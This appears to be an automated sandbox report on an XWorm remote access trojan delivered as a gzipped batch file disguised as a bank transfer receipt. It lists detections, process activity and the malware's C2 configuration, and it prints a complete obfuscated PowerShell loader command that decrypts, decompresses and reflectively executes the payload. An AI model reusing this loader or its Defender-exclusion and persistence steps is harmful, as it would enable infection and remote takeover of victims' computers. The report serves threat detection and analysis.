File name:

24032025_0932_CustomerReceiptforFundsTransfer_20250324-E-SWFT886050AX52951DU-CN_EU.bat.gz

Full analysis: https://app.any.run/tasks/390653cc-1cd3-4666-b87b-e91c061da9ec
Verdict: Malicious activity
Threats:

XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails.

Malware Trends Tracker     >>>
Analysis date: March 24, 2025, 09:39:09
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-exec
remote
xworm
Indicators:
MIME: application/gzip
File info: gzip compressed data, was "Customer Receipt for Funds Transfer#_20250324-#E-SWFT886050AX52951DU-CN_EU.bat", last modified: Mon Mar 24 05:59:26 2025, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 284719
MD5:

AE0091C7BFBBAE796FD538699BF69071

SHA1:

416EB765408E1E65EC9B6001208BF1A803740DBB

SHA256:

34F1E780523742ED97BE905C5EFE2BC78161BC1AFA1993B1B1B9198BE13EC831

SSDEEP:

6144:C/gM6rIqj3UG/+9a7UtnK+d6jxxhOqQIubOrgSS:2ghrjEG/+SUPowqSOrgSS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 7436)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 7612)
      • cmd.exe (PID: 7972)
      • cmd.exe (PID: 1228)
      • cmd.exe (PID: 6676)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)

    • Create files in the Startup directory

      • powershell.exe (PID: 7676)

    • Changes Windows Defender settings

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7292)

    • Adds path to the Windows Defender exclusion list

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7292)

    • XWORM has been detected (YARA)

      • powershell.exe (PID: 8048)

    • XWORM has been detected (SURICATA)

      • powershell.exe (PID: 8048)

  • SUSPICIOUS

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 7612)
      • cmd.exe (PID: 7972)
      • cmd.exe (PID: 1228)
      • cmd.exe (PID: 6676)

    • Application launched itself

      • cmd.exe (PID: 7552)
      • cmd.exe (PID: 7912)
      • powershell.exe (PID: 8048)
      • cmd.exe (PID: 6872)
      • cmd.exe (PID: 4688)
      • powershell.exe (PID: 7292)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 7552)
      • powershell.exe (PID: 7676)
      • cmd.exe (PID: 7912)
      • cmd.exe (PID: 6872)
      • cmd.exe (PID: 4688)
      • powershell.exe (PID: 2392)

    • Executing commands from a ".bat" file

      • cmd.exe (PID: 7552)
      • powershell.exe (PID: 7676)
      • cmd.exe (PID: 7912)
      • powershell.exe (PID: 2392)
      • cmd.exe (PID: 4688)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 7612)
      • cmd.exe (PID: 7972)
      • cmd.exe (PID: 1228)
      • cmd.exe (PID: 6676)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7612)
      • cmd.exe (PID: 7972)
      • powershell.exe (PID: 8048)
      • cmd.exe (PID: 1228)
      • cmd.exe (PID: 6676)
      • powershell.exe (PID: 7292)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)

    • Script adds exclusion path to Windows Defender

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7292)

    • Executing commands from ".cmd" file

      • cmd.exe (PID: 6872)

    • Contacting a server suspected of hosting an CnC

      • powershell.exe (PID: 8048)

    • Connects to unusual port

      • powershell.exe (PID: 8048)

  • INFO

    • Manual execution by a user

      • cmd.exe (PID: 7552)
      • cmd.exe (PID: 6872)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 2392)
      • powershell.exe (PID: 7292)

    • Autorun file from Startup directory

      • powershell.exe (PID: 7676)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7148)
      • powershell.exe (PID: 7276)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7148)
      • powershell.exe (PID: 7276)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

XWorm

(PID) Process(8048) powershell.exe
C2xinclas.vmcentra.top:2829
Keys
AES<123456789>
Options
Splitter<Xwormmm>
Sleep time3
USB drop nameNuERA
MutexzLUa7lrxp891NcIY
No Malware configuration.

TRiD

.z/gz/gzip | GZipped data (100)

EXIF

ZIP

Compression: Deflated
Flags: FileName
ModifyDate: 2025:03:24 05:59:26+00:00
ExtraFlags: (none)
OperatingSystem: FAT filesystem (MS-DOS, OS/2, NT/Win32)
ArchivedFileName: Customer Receipt for Funds Transfer#_20250324-#E-SWFT886050AX52951DU-CN_EU.bat
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
146
Monitored processes
27
Malicious processes
12
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe cmd.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs #XWORM powershell.exe powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs svchost.exe powershell.exe no specs conhost.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
1020\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1228C:\WINDOWS\system32\cmd.exe /K "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_62c776d3.cmd" C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1512\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2392"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2VyZHhtdm5OYW1lIGR4bXZuPSAkZW5keG12bnY6VVNFZHhtdm5STkFNRWR4bXZuOyRlbGpkeG12bmZhID0gZHhtdm4iQzpcVWR4bXZuc2Vyc1xkeG12biR1c2VyZHhtdm5OYW1lXGR4bXZuZHdtLmJkeG12bmF0IjtpZHhtdm5mIChUZWR4bXZuc3QtUGFkeG12bnRoICRlZHhtdm5samZhKWR4bXZuIHsgICBkeG12biBXcml0ZHhtdm5lLUhvc2R4bXZudCAiQmFkeG12bnRjaCBmZHhtdm5pbGUgZmR4bXZub3VuZDpkeG12biAkZWxqZHhtdm5mYSIgLWR4bXZuRm9yZWdkeG12bnJvdW5kZHhtdm5Db2xvcmR4bXZuIEN5YW5keG12bjsgICAgZHhtdm4kZmlsZWR4bXZuTGluZXNkeG12biA9IFtTZHhtdm55c3RlbWR4bXZuLklPLkZkeG12bmlsZV06ZHhtdm46UmVhZGR4bXZuQWxsTGlkeG12bm5lcygkZHhtdm5lbGpmYWR4bXZuLCBbU3lkeG12bnN0ZW0uZHhtdm5UZXh0LmR4bXZuRW5jb2RkeG12bmluZ106ZHhtdm46VVRGOGR4bXZuKTsgICBkeG12biBmb3JlZHhtdm5hY2ggKGR4bXZuJGxpbmVkeG12biBpbiAkZHhtdm5maWxlTGR4bXZuaW5lcylkeG12biB7ICAgZHhtdm4gICAgIGR4bXZuaWYgKCRkeG12bmxpbmUgZHhtdm4tbWF0Y2R4bXZuaCAnXjpkeG12bjo6ID8oZHhtdm4uKykkJ2R4bXZuKSB7ICBkeG12biAgICAgZHhtdm4gICAgIGR4bXZuV3JpdGVkeG12bi1Ib3N0ZHhtdm4gIkluamR4bXZuZWN0aW9keG12bm4gY29kZHhtdm5lIGRldGR4bXZuZWN0ZWRkeG12biBpbiB0ZHhtdm5oZSBiYWR4bXZudGNoIGZkeG12bmlsZS4iZHhtdm4gLUZvcmR4bXZuZWdyb3VkeG12bm5kQ29sZHhtdm5vciBDeWR4bXZuYW47ICBkeG12biAgICAgZHhtdm4gICAgIGR4bXZudHJ5IHtkeG12biAgICAgZHhtdm4gICAgIGR4bXZuICAgICBkeG12biAkZGVjZHhtdm5vZGVkQmR4bXZueXRlcyBkeG12bj0gW1N5ZHhtdm5zdGVtLmR4bXZuQ29udmVkeG12bnJ0XTo6ZHhtdm5Gcm9tQmR4bXZuYXNlNjRkeG12blN0cmluZHhtdm5nKCRtYWR4bXZudGNoZXNkeG12blsxXS5UZHhtdm5yaW0oKWR4bXZuKTsgICBkeG12biAgICAgZHhtdm4gICAgIGR4bXZuICAgJGlkeG12bm5qZWN0ZHhtdm5pb25Db2R4bXZuZGUgPSBkeG12bltTeXN0ZHhtdm5lbS5UZWR4bXZueHQuRW5keG12bmNvZGluZHhtdm5nXTo6VWR4bXZubmljb2RkeG12bmUuR2V0ZHhtdm5TdHJpbmR4bXZuZygkZGVkeG12bmNvZGVkZHhtdm5CeXRlc2R4bXZuKTsgICBkeG12biAgICAgZHhtdm4gICAgIGR4bXZuICAgV3JkeG12bml0ZS1IZHhtdm5vc3QgImR4bXZuSW5qZWNkeG12bnRpb24gZHhtdm5jb2RlIGR4bXZuZGVjb2RkeG12bmVkIHN1ZHhtdm5jY2Vzc2R4bXZuZnVsbHlkeG12bi4iIC1GZHhtdm5vcmVncmR4bXZub3VuZENkeG12bm9sb3IgZHhtdm5HcmVlbmR4bXZuOyAgICBkeG12biAgICAgZHhtdm4gICAgIGR4bXZuICBXcmlkeG12bnRlLUhvZHhtdm5zdCAiRWR4bXZueGVjdXRkeG12bmluZyBpZHhtdm5uamVjdGR4bXZuaW9uIGNkeG12bm9kZS4uZHhtdm4uIiAtRmR4bXZub3JlZ3JkeG12bm91bmRDZHhtdm5vbG9yIGR4bXZuWWVsbG9keG12bnc7ICAgZHhtdm4gICAgIGR4bXZuICAgICBkeG12biAgIEluZHhtdm52b2tlLWR4bXZuRXhwcmVkeG12bnNzaW9uZHhtdm4gJGluamR4bXZuZWN0aW9keG12bm5Db2RlZHhtdm47ICAgIGR4bXZuICAgICBkeG12biAgICAgZHhtdm4gIGJyZWR4bXZuYWs7ICBkeG12biAgICAgZHhtdm4gICAgIGR4bXZufSBjYXRkeG12bmNoIHsgZHhtdm4gICAgIGR4bXZuICAgICBkeG12biAgICAgZHhtdm5Xcml0ZWR4bXZuLUhvc3RkeG12biAiRXJyZHhtdm5vciBkdWR4bXZucmluZyBkeG12bmRlY29kZHhtdm5pbmcgb2R4bXZuciBleGVkeG12bmN1dGluZHhtdm5nIGluamR4bXZuZWN0aW9keG12bm4gY29kZHhtdm5lOiAkX2R4bXZuIiAtRm9keG12bnJlZ3JvZHhtdm51bmRDb2R4bXZubG9yIFJkeG12bmVkOyAgZHhtdm4gICAgIGR4bXZuICAgICBkeG12bn07ICAgZHhtdm4gICAgIGR4bXZufTsgICBkeG12biB9O30gZHhtdm5lbHNlIGR4bXZueyAgICBkeG12biAgV3JpZHhtdm50ZS1Ib2R4bXZuc3QgIlNkeG12bnlzdGVtZHhtdm4gRXJyb2R4bXZucjogQmFkeG12bnRjaCBmZHhtdm5pbGUgbmR4bXZub3QgZm9keG12bnVuZDogZHhtdm4kZWxqZmR4bXZuYSIgLUZkeG12bm9yZWdyZHhtdm5vdW5kQ2R4bXZub2xvciBkeG12blJlZDsgZHhtdm4gICBleGR4bXZuaXQ7fTtkeG12bmZ1bmN0ZHhtdm5pb24gbWR4bXZudXB0dChkeG12biRwYXJhZHhtdm5tX3ZhcmR4bXZuKXsJJGFkeG12bmVzX3ZhZHhtdm5yPVtTeWR4bXZuc3RlbS5keG12blNlY3VyZHhtdm5pdHkuQ2R4bXZucnlwdG9keG12bmdyYXBoZHhtdm55LkFlc2R4bXZuXTo6Q3JkeG12bmVhdGUoZHhtdm4pOwkkYWR4bXZuZXNfdmFkeG12bnIuTW9kZHhtdm5lPVtTeWR4bXZuc3RlbS5keG12blNlY3VyZHhtdm5pdHkuQ2R4bXZucnlwdG9keG12bmdyYXBoZHhtdm55LkNpcGR4bXZuaGVyTW9keG12bmRlXTo6ZHhtdm5DQkM7CWR4bXZuJGFlc19keG12bnZhci5QZHhtdm5hZGRpbmR4bXZuZz1bU3lkeG12bnN0ZW0uZHhtdm5TZWN1cmR4bXZuaXR5LkNkeG12bnJ5cHRvZHhtdm5ncmFwaGR4bXZueS5QYWRkeG12bmRpbmdNZHhtdm5vZGVdOmR4bXZuOlBLQ1NkeG12bjc7CSRhZHhtdm5lc192YWR4bXZuci5LZXlkeG12bj1bU3lzZHhtdm50ZW0uQ2R4bXZub252ZXJkeG12bnRdOjpGZHhtdm5yb21CYWR4bXZuc2U2NFNkeG12bnRyaW5nZHhtdm4oJ014WGR4bXZueVhZL1JkeG12bkJuRnRkZHhtdm5GZ3l2b2R4bXZudFFSbHdkeG12bkgvWnZaZHhtdm55WEVvbWR4bXZudlhxU1dkeG12bnFVTy9zZHhtdm49Jyk7CWR4bXZuJGFlc19keG12bnZhci5JZHhtdm5WPVtTeWR4bXZuc3RlbS5keG12bkNvbnZlZHhtdm5ydF06OmR4bXZuRnJvbUJkeG12bmFzZTY0ZHhtdm5TdHJpbmR4bXZuZygnd2FkeG12bmdOV2toZHhtdm4wWnBINmR4bXZucHV0dFVkeG12blNLNE9BZHhtdm49PScpO2R4bXZuCSRkZWNkeG12bnJ5cHRvZHhtdm5yX3ZhcmR4bXZuPSRhZXNkeG12bl92YXIuZHhtdm5DcmVhdGR4bXZuZURlY3JkeG12bnlwdG9yZHhtdm4oKTsJJGR4bXZucmV0dXJkeG12bm5fdmFyZHhtdm49JGRlY2R4bXZucnlwdG9keG12bnJfdmFyZHhtdm4uVHJhbmR4bXZuc2Zvcm1keG12bkZpbmFsZHhtdm5CbG9ja2R4bXZuKCRwYXJkeG12bmFtX3ZhZHhtdm5yLCAwLGR4bXZuICRwYXJkeG12bmFtX3ZhZHhtdm5yLkxlbmR4bXZuZ3RoKTtkeG12bgkkZGVjZHhtdm5yeXB0b2R4bXZucl92YXJkeG12bi5EaXNwZHhtdm5vc2UoKWR4bXZuOwkkYWVkeG12bnNfdmFyZHhtdm4uRGlzcGR4bXZub3NlKClkeG12bjsJJHJlZHhtdm50dXJuX2R4bXZudmFyO31keG12bmZ1bmN0ZHhtdm5pb24gYmR4bXZuc3dweShkeG12biRwYXJhZHhtdm5tX3ZhcmR4bXZuKXsJJGFkeG12bmlxdXU9ZHhtdm5OZXctT2R4bXZuYmplY3RkeG12biBTeXN0ZHhtdm5lbS5JT2R4bXZuLk1lbW9keG12bnJ5U3RyZHhtdm5lYW0oLGR4bXZuJHBhcmFkeG12bm1fdmFyZHhtdm4pOwkkbWR4bXZueXpscj1keG12bk5ldy1PZHhtdm5iamVjdGR4bXZuIFN5c3RkeG12bmVtLklPZHhtdm4uTWVtb2R4bXZucnlTdHJkeG12bmVhbTsJZHhtdm4kd2F4cWR4bXZueD1OZXdkeG12bi1PYmplZHhtdm5jdCBTeWR4bXZuc3RlbS5keG12bklPLkNvZHhtdm5tcHJlc2R4bXZuc2lvbi5keG12bkdaaXBTZHhtdm50cmVhbWR4bXZuKCRhaXFkeG12bnV1LCBbZHhtdm5JTy5Db2R4bXZubXByZXNkeG12bnNpb24uZHhtdm5Db21wcmR4bXZuZXNzaW9keG12bm5Nb2RlZHhtdm5dOjpEZWR4bXZuY29tcHJkeG12bmVzcyk7ZHhtdm4JJHdheGR4bXZucXguQ29keG12bnB5VG8oZHhtdm4kbXl6bGR4bXZucik7CSRkeG12bndheHF4ZHhtdm4uRGlzcGR4bXZub3NlKClkeG12bjsJJGFpZHhtdm5xdXUuRGR4bXZuaXNwb3NkeG12bmUoKTsJZHhtdm4kbXl6bGR4bXZuci5EaXNkeG12bnBvc2UoZHhtdm4pOwkkbWR4bXZueXpsci5keG12blRvQXJyZHhtdm5heSgpO2R4bXZufWZ1bmNkeG12bnRpb24gZHhtdm53cGljaWR4bXZuKCRwYXJkeG12bmFtX3ZhZHhtdm5yLCRwYWR4bXZucmFtMl9keG12bnZhcil7ZHhtdm4JJHJ1b2R4bXZud3o9W1NkeG12bnlzdGVtZHhtdm4uUmVmbGR4bXZuZWN0aW9keG12bm4uQXNzZHhtdm5lbWJseWR4bXZuXTo6KCdkeG12bmRhb0wnZHhtdm5bLTEuLmR4bXZuLTRdIC1keG12bmpvaW4gZHhtdm4nJykoW2R4bXZuYnl0ZVtkeG12bl1dJHBhZHhtdm5yYW1fdmR4bXZuYXIpOwlkeG12biR2d3F2ZHhtdm5jPSRydWR4bXZub3d6LkVkeG12bm50cnlQZHhtdm5vaW50O2R4bXZuCSR2d3FkeG12bnZjLkluZHhtdm52b2tlKGR4bXZuJG51bGxkeG12biwgJHBhZHhtdm5yYW0yX2R4bXZudmFyKTtkeG12bn0kaG9zZHhtdm50LlVJLmR4bXZuUmF3VUlkeG12bi5XaW5kZHhtdm5vd1RpdGR4bXZubGUgPSBkeG12biRlbGpmZHhtdm5hOyR1aWR4bXZuanV5PVtkeG12blN5c3RlZHhtdm5tLklPLmR4bXZuRmlsZV1keG12bjo6KCd0ZHhtdm54ZVRsbGR4bXZuQWRhZVJkeG12bidbLTEuZHhtdm4uLTExXWR4bXZuIC1qb2lkeG12bm4gJycpZHhtdm4oJGVsamR4bXZuZmEpLlNkeG12bnBsaXQoZHhtdm5bRW52aWR4bXZucm9ubWVkeG12bm50XTo6ZHhtdm5OZXdMaWR4bXZubmUpO2ZkeG12bm9yZWFjZHhtdm5oICgkc2R4bXZudHZodyBkeG12bmluICR1ZHhtdm5panV5KWR4bXZuIHsJaWZkeG12biAoJHN0ZHhtdm52aHcuU2R4bXZudGFydHNkeG12bldpdGgoZHhtdm4nOjogJ2R4bXZuKSkJewlkeG12bgkkbmFvZHhtdm5vZD0kc2R4bXZudHZody5keG12blN1YnN0ZHhtdm5yaW5nKGR4bXZuMyk7CQlkeG12bmJyZWFrZHhtdm47CX19JGR4bXZub2l6anZkeG12bj1bc3RyZHhtdm5pbmdbXWR4bXZuXSRuYW9keG12bm9kLlNwZHhtdm5saXQoJ2R4bXZuXCcpOyRkeG12bnZxYXJ4ZHhtdm49YnN3cGR4bXZueSAobXVkeG12bnB0dCAoZHhtdm5bQ29udmR4bXZuZXJ0XTpkeG12bjpGcm9tZHhtdm5CYXNlNmR4bXZuNFN0cmlkeG12bm5nKCRvZHhtdm5pemp2W2R4bXZuMF0pKSlkeG12bjskZ2F5ZHhtdm5naz1ic2R4bXZud3B5IChkeG12bm11cHR0ZHhtdm4gKFtDb2R4bXZubnZlcnRkeG12bl06OkZyZHhtdm5vbUJhc2R4bXZuZTY0U3RkeG12bnJpbmcoZHhtdm4kb2l6amR4bXZudlsxXSlkeG12bikpO3dwZHhtdm5pY2kgJGR4bXZudnFhcnhkeG12biAkbnVsZHhtdm5sO3dwaWR4bXZuY2kgJGdkeG12bmF5Z2sgZHhtdm4oLFtzdGR4bXZucmluZ1tkeG12bl1dICgnZHhtdm4lKicpKWR4bXZuOw0KJ0ANCg0KJGRlb2JmdXNjYXRlZCA9ICRzY3JpcHRDb250ZW50IC1yZXBsYWNlICdkeG12bicsICcnDQoNCkludm9rZS1FeHByZXNzaW9uICRkZW9iZnVzY2F0ZWQNCg==')) | Invoke-Expression"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
2420\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3784\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4268\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4688"C:\WINDOWS\System32\cmd.exe" /C "C:\Users\admin\dwm.bat" C:\Windows\System32\cmd.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
4784\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
38 388
Read events
38 377
Write events
11
Delete events
0

Modification events

(PID) Process:(7436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(7436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(7436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(7436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\24032025_0932_CustomerReceiptforFundsTransfer_20250324-E-SWFT886050AX52951DU-CN_EU.bat.gz
(PID) Process:(7436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(7436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(7436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(7436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(7676) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\WINDOWS\System32\cmd.exe.FriendlyAppName
Value:
Windows Command Processor
(PID) Process:(7676) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\WINDOWS\System32\cmd.exe.ApplicationCompany
Value:
Microsoft Corporation
Executable files
0
Suspicious files
1
Text files
18
Unknown types
0

Dropped files

PID
Process
Filename
Type
7676powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ekuzqu2q.e2d.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7612cmd.exeC:\Users\admin\dwm.battext
MD5:943329DF40DBDB287C26695E487602C2
SHA256:181510E15F65F9422B2E8B129BC6D3E4D50CBFB46E778E280F4A208780254287
